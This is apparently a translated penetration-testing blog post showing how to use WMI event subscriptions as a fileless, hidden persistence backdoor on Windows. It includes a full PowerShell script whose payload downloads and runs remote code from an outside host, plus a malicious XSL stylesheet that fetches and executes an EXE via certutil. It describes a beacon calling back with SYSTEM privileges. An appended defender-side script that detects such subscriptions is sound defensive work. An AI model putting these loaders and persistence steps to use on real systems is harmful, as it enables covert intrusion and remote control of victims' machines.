0x01 Foreword
WMIC extends WMI (Windows Management Instrumentation) with a command-line interface, so that system administration tasks can be run interactively or from batch scripts.
At Black Hat 2015, Matt Graeber described how WMI can be used as a fileless backdoor.
WMI can be described as a set of methods and functions for managing Windows systems; think of it as an API for talking to the Windows system itself. Its value for penetration testing is that nothing needs to be downloaded or installed, because WMI is a built-in Windows feature, and the whole operation takes place in the computer's memory without leaving any traces.
0x02 Common uses of WMI
Retrieving system information
Retrieving installed software, services and startup items:
```
wmic product list brief |more
wmic service list brief |more
wmic startup list brief |more
```
Finding the domain controller:
```
wmic ntdomain list brief
```
The following is the WMI-Persistence.ps1 script. The code is very simple: three functions that install the specified WMI event subscription, remove it, and list the existing WMI event subscriptions. The only part that needs changing is the remote payload address in the $Payload line.
You can of course also change the event names if you want, but do not change too much, otherwise the errors pile up and are hard to spot at a glance.
```powershell
function Install-Persistence {
    $Payload = "((new-object net.webclient).downloadstring('http://192.168.3.68:80/logo.gif'))"
    $EventFilterName = 'Cleanup'
    $EventConsumerName = 'DataCleanup'
    $finalPayload = "powershell.exe -nop -c `"IEX $Payload`""

    # Create event filter
    $EventFilterArgs = @{
        EventNamespace = 'root/cimv2'
        Name = $EventFilterName
        Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"
        QueryLanguage = 'WQL'
    }
    $Filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments $EventFilterArgs

    # Create CommandLineEventConsumer
    $CommandLineConsumerArgs = @{
        Name = $EventConsumerName
        CommandLineTemplate = $finalPayload
    }
    $Consumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments $CommandLineConsumerArgs

    # Create FilterToConsumerBinding
    $FilterToConsumerArgs = @{
        Filter = $Filter
        Consumer = $Consumer
    }
    $FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments $FilterToConsumerArgs

    # Confirm the Event Filter was created
    $EventCheck = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = '$EventFilterName'"
    if ($EventCheck -ne $null) {
        Write-Host "Event Filter $EventFilterName successfully written to host"
    }

    # Confirm the Event Consumer was created
    $ConsumerCheck = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = '$EventConsumerName'"
    if ($ConsumerCheck -ne $null) {
        Write-Host "Event Consumer $EventConsumerName successfully written to host"
    }

    # Confirm the FilterToConsumer binding was created
    $BindingCheck = Get-WmiObject -Namespace root/subscription -Class __FilterToConsumerBinding -Filter "Filter = ""__eventfilter.name='$EventFilterName'"""
    if ($BindingCheck -ne $null) {
        Write-Host "Filter To Consumer Binding successfully written to host"
    }
}

function Remove-Persistence {
    $EventFilterName = 'Cleanup'
    $EventConsumerName = 'DataCleanup'

    # Clean up Code - Comment this code out when you are installing persistence otherwise it will
    $EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = '$EventConsumerName'"
    $EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = '$EventFilterName'"
    $FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding"

    $FilterConsumerBindingToCleanup | Remove-WmiObject
    $EventConsumerToCleanup | Remove-WmiObject
    $EventFilterToCleanup | Remove-WmiObject
}

function Check-WMI {
    Write-Host "Showing All Root Event Filters"
    Get-WmiObject -Namespace root/subscription -Class __EventFilter
    Write-Host "Showing All CommandLine Event Consumers"
    Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer
    Write-Host "Showing All Filter to Consumer Bindings"
    Get-WmiObject -Namespace root/subscription -Class __FilterToConsumerBinding
}
```
Then insert the event. Once the insertion succeeds, the next time the target restarts and the administrator logs in normally, wait a moment (in 2016 you may have to wait a little longer): when the system polls the event in the background, our payload is triggered and executed.
```powershell
PS > Import-Module .\WMI-Persistence.ps1
PS > Install-Persistence
PS > Check-WMI
```
The beacon then calls back normally with SYSTEM privileges.
We can also use WMI's remote loading feature, with an XSL stylesheet such as the following:
```xml
<?xml version='1.0'?>
<stylesheet xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" xmlns:user="placeholder" version="1.0">
  <output method="text"/>
  <ms:script implements-prefix="user" language="JScript">
    <![CDATA[
      var r = new ActiveXObject("WScript.Shell").Run("cmd.exe /c certutil -urlcache -split -f http://*/load.jpg %temp%/load.exe & %temp%/load.exe & certutil.exe -urlcache -split -f http://*/load.jpg delete",0);
    ]]>
  </ms:script>
</stylesheet>
```
Modify the WMI-Persistence.ps1 script: only the payload part needs to be swapped out, nothing else needs to change.
```
wmic os get /FORMAT:"http://192.168.3.68:80/wmi.xsl"
```
```powershell
powershell -exec bypass
PS > Import-Module .\WMI-Persistence.ps1
PS > Install-Persistence
PS > Check-WMI
PS > Remove-Persistence
```
Be sure to remove it as soon as you are done with it.
This also achieves a customized callback.
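As an added example (not part of the original post or the WMI-Persistence.ps1 script), the following defender-side check enumerates the root/subscription bindings that Install-Persistence creates and flags any consumer whose command line matches the loader shapes used above, both the PowerShell IEX cradle and the wmic /FORMAT remote XSL; the function names and indicator list are assumptions, while the filter and consumer names and payload forms come from this post.

```powershell
# Added example, not code from the original post: enumerate the permanent WMI
# event subscriptions stored in root/subscription and flag any consumer whose
# command line resembles the loaders shown above (PowerShell download cradle,
# wmic /FORMAT with a remote XSL, certutil -urlcache). The subscription survives
# reboots in the WMI repository, which is exactly what makes it enumerable here.
# Function names and the indicator list are assumptions. Run as an administrator
# in Windows PowerShell 5.1 (Get-WmiObject is not available in PowerShell 7).

$Namespace = 'root/subscription'
# Substrings from the payload forms used in this post, matched case-insensitively.
$Indicators = @('downloadstring', 'iex ', 'invoke-expression', '/format:', 'certutil',
                '-urlcache', 'wscript.shell', '-nop', 'http://', 'https://')

function Resolve-WmiReference {
    # Turns a binding reference such as  __EventFilter.Name="Cleanup"  into the
    # referenced instance (Name is the key of both filters and consumers).
    param([string]$Reference)
    if ($Reference -match '^(?<class>\w+)\.Name="(?<name>.*)"$') {
        $name = $Matches.name -replace "'", "''"
        Get-WmiObject -Namespace $Namespace -Class $Matches.class -Filter "Name='$name'"
    }
}

function Get-WmiSubscriptionFindings {
    $findings = @()
    foreach ($binding in Get-WmiObject -Namespace $Namespace -Class __FilterToConsumerBinding) {
        $filter   = Resolve-WmiReference $binding.Filter
        $consumer = Resolve-WmiReference $binding.Consumer
        # CommandLineEventConsumer executes CommandLineTemplate; ActiveScriptEventConsumer
        # executes ScriptText. Other consumer types (e.g. NTEventLogEventConsumer) have neither.
        $command = if ($consumer.CommandLineTemplate) { $consumer.CommandLineTemplate } else { $consumer.ScriptText }
        $hits = @($Indicators | Where-Object { $command -and $command.ToLower().Contains($_) })
        $findings += [pscustomobject]@{
            Filter     = $filter.Name
            Query      = $filter.Query          # the post's uptime-window query is itself a tell
            Consumer   = $consumer.Name
            Class      = $consumer.__CLASS
            Command    = $command
            Suspicious = ($hits.Count -gt 0)
            Indicators = ($hits -join ', ')
        }
    }
    $findings
}

# Windows ships a default 'SCM Event Log Consumer' binding that will report
# Suspicious = False; a 'Cleanup' -> 'DataCleanup' pair running powershell.exe -nop -c "IEX ..."
# as created by Install-Persistence above will report True with the matching indicators.
Get-WmiSubscriptionFindings | Sort-Object Suspicious -Descending | Format-List
```

A binding confirmed as malicious is removed the same way Remove-Persistence does it: delete the __FilterToConsumerBinding first, then the consumer and the filter, since the binding references both.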